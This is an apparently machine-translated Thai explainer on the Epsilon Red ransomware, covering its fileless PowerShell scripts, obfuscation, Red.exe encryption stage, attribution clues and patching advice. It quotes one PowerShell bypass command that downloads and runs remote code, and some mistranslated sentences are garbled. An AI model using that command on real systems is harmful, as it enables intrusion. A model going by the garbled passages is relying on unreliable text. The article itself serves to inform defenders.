Epsilon Red ransomware คืออะไร?

คุณได้แพตช์เซิร์ฟเวอร์ของคุณแล้วหรือยัง?

ภัยคุกคามแรนซัมแวร์ ตัวใหม่ ที่เรียกว่า Epsilon Red มีเป้าหมายไปที่เซิร์ฟเวอร์ที่ใช้ Microsoft ที่ไม่ได้รับการติดตั้งในศูนย์ข้อมูลขององค์กร ตั้งชื่อตามตัวร้ายที่ไม่ค่อยมีใครรู้จักจากการ์ตูน Marvel เมื่อเร็วๆ นี้ Epsilon Red ถูกค้นพบโดยบริษัทรักษาความปลอดภัยทางไซเบอร์ชื่อ Sophos นับตั้งแต่การค้นพบแรนซัมแวร์ได้โจมตีหลายองค์กรทั่วโลก

Fileless ransomware "ซ่อน" ใน PowerShell

Fileless ransomwareคือมัลแวร์รูปแบบหนึ่งที่ดำเนินการโดยการรวมซอฟต์แวร์ที่ถูกต้องตามกฎหมายเข้าด้วยกัน มัลแวร์ไร้ไฟล์ที่ใช้PowerShellใช้ความสามารถของ PowerShell เพื่อโหลดลงในหน่วยความจำของอุปกรณ์โดยตรง คุณลักษณะนี้ช่วยปกป้องมัลแวร์ในสคริปต์ PowerShell จากการตรวจพบ

ในสถานการณ์ทั่วไป เมื่อสคริปต์ทำงาน จะต้องเขียนสคริปต์ลงในไดรฟ์ของอุปกรณ์ก่อน ซึ่งช่วยให้โซลูชั่นรักษาความปลอดภัยปลายทางสามารถตรวจจับสคริปต์ได้ เนื่องจาก PowerShell ถูกแยกออกจากกระบวนการเรียกใช้สคริปต์มาตรฐาน จึงสามารถข้ามการรักษาความปลอดภัยของจุดสิ้นสุดได้ นอกจากนี้ การใช้ พารามิเตอร์ บายพาสในสคริปต์ PowerShell ช่วยให้ผู้โจมตีสามารถหลีกเลี่ยงข้อจำกัดของสคริปต์เครือข่ายได้

ตัวอย่างของพารามิเตอร์บายพาส PowerShell คือ:

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

อย่างที่คุณเห็น การออกแบบพารามิเตอร์บายพาส PowerShell นั้นค่อนข้างง่าย

เพื่อเป็นการตอบสนอง Microsoft ได้ออกแพทช์เพื่อแก้ไขช่องโหว่การดำเนินการมัลแวร์ระยะไกลที่เกี่ยวข้องกับ PowerShell อย่างไรก็ตาม แผ่นแปะจะมีประสิทธิภาพเท่าที่มีการใช้งานเท่านั้น หลายองค์กรมีมาตรฐานการแพตช์ที่ผ่อนคลาย ทำให้สภาพแวดล้อมเสี่ยงต่อการถูกโจมตี การออกแบบของ Epsilon Red คือการใช้ประโยชน์จากระดับช่องโหว่นั้น

ประโยชน์สองประการของ Epsilon Red

เนื่องจาก Epsilon Red มีประสิทธิภาพสูงสุดกับเซิร์ฟเวอร์ Microsoft ที่ไม่ได้รับการติดตั้ง มัลแวร์จึงสามารถใช้เป็นแรนซัมแวร์และเครื่องมือระบุตัวตนได้ การที่ Epsilon จะประสบความสำเร็จในสภาพแวดล้อมนั้นจะช่วยให้ผู้โจมตีเข้าใจถึงความสามารถด้านความปลอดภัยของเป้าหมายได้ดียิ่งขึ้น

หาก Epsilon เข้าถึง Microsoft Exchange Server ได้สำเร็จ แสดงว่าองค์กรไม่ปฏิบัติตามแนวทางปฏิบัติที่ดีที่สุดในการรักษาความปลอดภัยด้วยแพตช์ทั่วไป สำหรับผู้โจมตี สิ่งนี้แสดงให้เห็นว่า Epsilon สามารถทำลายสภาพแวดล้อมที่เหลือของเป้าหมายได้อย่างง่ายดายเพียงใด

Epsilon Red ใช้ Obfuscation เพื่อซ่อนเพย์โหลด การสร้างความสับสนทำให้โค้ดไม่สามารถอ่านได้ และใช้ในมัลแวร์ PowerShell เพื่อหลีกเลี่ยงไม่ให้สคริปต์ PowerShell สามารถอ่านได้ในระดับสูง ด้วยการทำให้สับสน PowerShell cmdlets นามแฝง จะถูกใช้เพื่อทำให้ซอฟต์แวร์ป้องกันไวรัสระบุสคริปต์ที่เป็นอันตรายในบันทึกของ PowerShell ได้ยาก

Epsilon Red มีประสิทธิภาพสูงสุดกับเซิร์ฟเวอร์ Microsoft ที่ไม่ได้รับการติดตั้ง

อย่างไรก็ตาม สคริปต์ PowerShell ที่สร้างความสับสนยังคงสามารถระบุได้ สัญญาณทั่วไปของการโจมตี PowerShell Script ที่กำลังจะเกิดขึ้นคือการสร้างออบเจ็กต์ WebClient ผู้โจมตีจะสร้างวัตถุ WebClient ในโค้ด PowerShell เพื่อสร้างการเชื่อมต่อภายนอกไปยังURL ระยะไกล ที่มีโค้ดที่เป็นอันตราย

หากองค์กรถูกโจมตี ความเป็นไปได้ที่องค์กรจะมีมาตรการรักษาความปลอดภัยเพียงพอในการตรวจจับสคริปต์ PowerShell ที่สับสนนั้นต่ำมาก ในทางกลับกัน หาก Epsilon Red ไม่สามารถเจาะเซิร์ฟเวอร์ได้ จะเป็นการแจ้งให้ผู้โจมตีทราบว่าเครือข่ายของเป้าหมายสามารถถอดรหัสมัลแวร์ PowerShell ได้อย่างรวดเร็ว ทำให้การโจมตีมีคุณค่าน้อยลง มีคุณค่ามากขึ้น

การบุกรุกทางไซเบอร์ของเอปซิลอน เรด

ฟังก์ชั่นของ Epsilon Red นั้นง่ายมาก ซอฟต์แวร์นี้ใช้ชุดสคริปต์ Powershell เพื่อแทรกซึมเซิร์ฟเวอร์ สคริปต์ PowerShell เหล่านี้มีหมายเลขตั้งแต่1.ps1ถึง12.ps1การออกแบบสคริปต์ PowerShell แต่ละรายการคือการเตรียมเซิร์ฟเวอร์ปลายทางสำหรับเพย์โหลดสุดท้าย

สคริปต์ PowerShell ทั้งหมดใน Epsilon Red มีวัตถุประสงค์ของตัวเอง หนึ่งในสคริปต์ PowerShell ใน Epsilon Red ได้รับการออกแบบมาเพื่อแก้ไขกฎไฟร์วอลล์เครือข่ายของเป้าหมาย ซอฟต์แวร์อื่นในชุดนี้ออกแบบมาเพื่อถอนการติดตั้งซอฟต์แวร์ป้องกันไวรัสของเป้าหมาย

ดังที่คุณอาจเดาได้ สคริปต์เหล่านี้ทำงานสอดคล้องกันเพื่อให้แน่ใจว่าเมื่อมีการส่งเพย์โหลดแล้ว เป้าหมายจะไม่สามารถหยุดความคืบหน้าได้อย่างรวดเร็ว

• Ryuk ransomware คืออะไร? จะหลีกเลี่ยงได้อย่างไร?

ส่งน้ำหนักบรรทุก

เมื่อสคริปต์ PowerShell ของ Epsilon ได้สร้างเพย์โหลดสุดท้ายแล้ว สคริปต์นั้นจะถูกแจกจ่ายเป็นส่วนขยายRed.exeเมื่อเข้าสู่เซิร์ฟเวอร์ Red.exe จะสแกนไฟล์ของเซิร์ฟเวอร์และสร้างรายการเส้นทางไดเรกทอรีสำหรับแต่ละไฟล์ที่ตรวจพบ หลังจากสร้างรายการแล้ว กระบวนการย่อยจะถูกสร้างขึ้นจากไฟล์มัลแวร์หลักสำหรับแต่ละเส้นทางไดเรกทอรีในรายการ จากนั้นไฟล์ย่อยของแรนซัมแวร์แต่ละไฟล์จะเข้ารหัสเส้นทางไดเรกทอรีจากไฟล์รายการ

หลังจากที่เส้นทางโฟลเดอร์ทั้งหมดในรายการของ Epson ได้รับการเข้ารหัสแล้วไฟล์ .txtจะถูกทิ้งไว้เพื่อแจ้งเป้าหมายและระบุคำขอของผู้โจมตี นอกจากนี้ โหนดเครือข่ายที่สามารถเข้าถึงได้ทั้งหมดที่เชื่อมต่อกับเซิร์ฟเวอร์ที่ถูกบุกรุกจะถูกบุกรุก และโอกาสที่มัลแวร์จะเข้าสู่เครือข่ายอาจเพิ่มขึ้น

ใครอยู่เบื้องหลังเอปซิลอน เรด?

ยังไม่ทราบตัวตนของผู้โจมตีที่อยู่เบื้องหลังเอปซิลอน เรด

ยังไม่ทราบตัวตนของผู้โจมตีที่อยู่เบื้องหลังเอปซิลอน เรด อย่างไรก็ตาม มีเบาะแสบางอย่างชี้ไปที่ที่มาของผู้โจมตี เบาะแสแรกคือชื่อของมัลแวร์ Epsilon Red คือวายร้าย X-Men ที่มีเรื่องราวมาจากรัสเซีย

เบาะแสที่สองอยู่ในบันทึกค่าไถ่ของไฟล์ .txt ที่โค้ดทิ้งไว้ มันคล้ายกับข้อความที่แก๊งแรนซัมแวร์ทิ้งไว้ซึ่งเรียกว่า REvil อย่างไรก็ตาม ความคล้ายคลึงกันนี้ไม่ได้บ่งชี้ว่าผู้โจมตีเป็นสมาชิกของกลุ่มนี้ REvil ดำเนินการ RaaS (Ransomware as a service) ซึ่งบริษัทในเครือจ่ายเงินให้กับ REvil สำหรับการเข้าถึงมัลแวร์

ป้องกันตัวเองจากเอปซิลอน เรด

จนถึงตอนนี้ Epsilon Red เจาะเซิร์ฟเวอร์ที่ไม่ได้รับแพตช์ได้สำเร็จ ซึ่งหมายความว่าหนึ่งในการป้องกัน Epsilon Red และมัลแวร์เรียกค่าไถ่ที่คล้ายกันที่ดีที่สุดก็คือการตรวจสอบให้แน่ใจว่าสภาพแวดล้อมของคุณได้รับการจัดการอย่างเหมาะสม นอกจากนี้ การมีโซลูชันความปลอดภัยที่สามารถถอดรหัสสคริปต์ PowerShell ได้อย่างรวดเร็วจะเป็นประโยชน์เพิ่มเติมต่อสภาพแวดล้อมของคุณ